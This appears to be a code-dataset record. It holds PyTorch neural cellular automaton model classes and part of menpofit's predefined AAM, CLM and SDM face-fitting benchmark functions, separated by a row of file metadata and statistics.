# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), other_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
y = self.perception(x)
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, mask_new_cells_clamped2
# Cell
class CeA_00(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, pretrain_thres=100):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(CeA_00, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.pretrain_thres = pretrain_thres
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for epoch_in in range(epochs_inside):
x, alive_mask, other = self.forward(x, epoch_in, epoch_outside)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
# target_loss = target_loss_func(x[:,:2, :,:], target) # ORIGINAL
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), other.detach().cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
# self_pretraining
if epoch_outside < self.pretrain_thres:
alive_mask = self.get_alive_mask(x)
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_previous = torch.zeros_like(alive_mask)#OMM added in CeA
# MASK CLAMP
# | = self.background_intensity
# X = self.step_size
# S = self.scale_mask
# ch0 ch1 ch2 ...
# |||||||||||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||XXXX||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||XX||||XX||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# ||XX||||||XX|| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||XX||||XX||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||XXXX||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||||||||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
mask_diff = alive_mask - mask_previous
mask_clamp_ch0 = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_clamp = torch.repeat_interleave(mask_clamp_ch0,16,1)
mask_clamp_ones = torch.ones_like(torch.squeeze(mask_clamp_ch0))*self.scale_mask
for idx_channel in np.arange(1,16,1):
mask_clamp[:,idx_channel,:,:] = mask_clamp_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
P = self.perception(x)
Y = self.model(P)
out = x + (Y * mask * mask_clamp)
out *= alive_mask
return out, alive_mask, mask_clamp
# Cell
class ca_model_laplacian_regularizer(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, reg1=1):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_laplacian_regularizer, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.reg1 = reg1
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for epoch_in in range(epochs_inside):
x, alive_mask, other_mask = self.forward(x, epoch_in, epoch_outside)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
sobel_regularizer = sobel_reg(x)
# print(f' out(x)={x.shape}, sobel_regularizer={sobel_regularizer}')
loss = target_loss + (sobel_regularizer*self.reg1)
return loss, x, alive_mask.cpu().numpy(), other_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
mode = 0
if epoch_outside < 100:
alive_mask = self.get_alive_mask(x)
mode = 1
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
mode = 2
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mode = 3
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
y = self.perception(x)
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
# print(f'({epoch_in}) ({mode}) y={y.shape} alive_mask={alive_mask.shape} out={out.shape}')
return out, alive_mask, mask_new_cells_clamped2
# Cell
class ca_model_l2reg(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, l2reg=0):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_l2reg, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.l2reg = l2reg
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
the loss is calculated for only the first 4 channels of the output
'''
x = seed
for epoch_in in range(epochs_inside):
x, alive_mask, Y = self.forward(x, epoch_in, epoch_outside)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss_reg = torch.sum(torch.abs(Y[:,:1,...]))
loss = target_loss + (loss_reg*self.l2reg)
return loss, x, alive_mask.cpu().numpy(), Y.detach().cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if epoch_outside < 100:
alive_mask = self.get_alive_mask(x)
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
P = self.perception(x)
Y = self.model(P)
out = x + Y *mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, Y #mask_new_cells_clamped2 | 40.522167 | 169 | 0.586774 | 6,054 | 41,130 | 3.817476 | 0.059465 | 0.014539 | 0.016615 | 0.015231 | 0.876552 | 0.867725 | 0.867206 | 0.855999 | 0.851023 | 0.848081 | 0 | 0.042658 | 0.269317 | 41,130 | 1,015 | 170 | 40.522167 | 0.72635 | 0.200219 | 0 | 0.769634 | 1 | 0.001745 | 0.01574 | 0.007721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095986 | false | 0 | 0.019197 | 0 | 0.198953 | 0.00349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3780f41176c4335cc90b285843e882a8598adb65 | 34,202 | py | Python | menpofit/benchmark/predefined.py | trigeorgis/menpofit | 742f4d1aeeb822a615d88ac499df40009b05795f | [
"BSD-3-Clause"
] | 1 | 2015-07-26T18:33:56.000Z | 2015-07-26T18:33:56.000Z | menpofit/benchmark/predefined.py | ersisimou/menpofit | 55ec53205ba31fd42ca054b2ce07590490decb8c | [
"BSD-3-Clause"
] | null | null | null | menpofit/benchmark/predefined.py | ersisimou/menpofit | 55ec53205ba31fd42ca054b2ce07590490decb8c | [
"BSD-3-Clause"
] | null | null | null | from menpo.landmark import ibug_face_68_trimesh
from menpo.feature import sparse_hog, igo
from menpofit.lucaskanade import AIC
from menpofit.transform import OrthoMDTransform, DifferentiablePiecewiseAffine
from menpofit.modelinstance import OrthoPDM
from menpofit.gradientdescent import RLMS
from menpofit.clm.classifier import linear_svm_lr
from .io import import_bounding_boxes
from .base import (aam_build_benchmark, aam_fit_benchmark,
clm_build_benchmark, clm_fit_benchmark,
sdm_build_benchmark, sdm_fit_benchmark,
load_database, convert_fitting_results_to_ced,
plot_fitting_curves)
def aam_fastest_alternating_noise(training_db_path, fitting_db_path,
features=igo, noise_std=0.04,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.2,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': 'me_norm'
}
perturb_options = {'noise_std': 0.04,
'rotation': False}
# set passed parameters
training_options['features'] = features
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_fastest_alternating_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path, features=igo,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.1,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': [igo] * 3,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': 'me_norm'
}
# set passed parameters
training_options['features'] = features
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_best_performance_alternating_noise(training_db_path, fitting_db_path,
features=igo, noise_std=0.04,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.2,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.2,
'scaled_shape_models': False,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.04,
'rotation': False}
# set passed parameters
training_options['features'] = features
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_best_performance_alternating_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path,
features=igo, verbose=False,
plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.5,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': 200,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 100,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
# set passed parameters
training_options['features'] = features
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def clm_basic_noise(training_db_path, fitting_db_path,
features=sparse_hog, classifier_trainers=linear_svm_lr,
noise_std=0.04, verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.4,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': [sparse_hog] * 3,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.01,
'rotation': False}
# set passed parameters
training_options['features'] = features
training_options['classifier_trainers'] = classifier_trainers
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = clm_fit_benchmark(fitting_images, clm,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "CLMs with {} and {} classifier using RLMS".format(
training_options['features'].__name__,
training_options['classifier_trainers'])
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def clm_basic_bbox(training_db_path, fitting_db_path, fitting_bboxes_path,
features=sparse_hog, classifier_trainers=linear_svm_lr,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.5,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': [sparse_hog] * 3,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
# set passed parameters
training_options['features'] = features
training_options['classifier_trainers'] = classifier_trainers
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = clm_fit_benchmark(fitting_images, clm,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "CLMs with {} and {} classifier using RLMS".format(
training_options['features'].__name__,
training_options['classifier_trainers'])
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def sdm_fastest_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path, features=None,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.8,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'normalization_diagonal': 200,
'n_levels': 4,
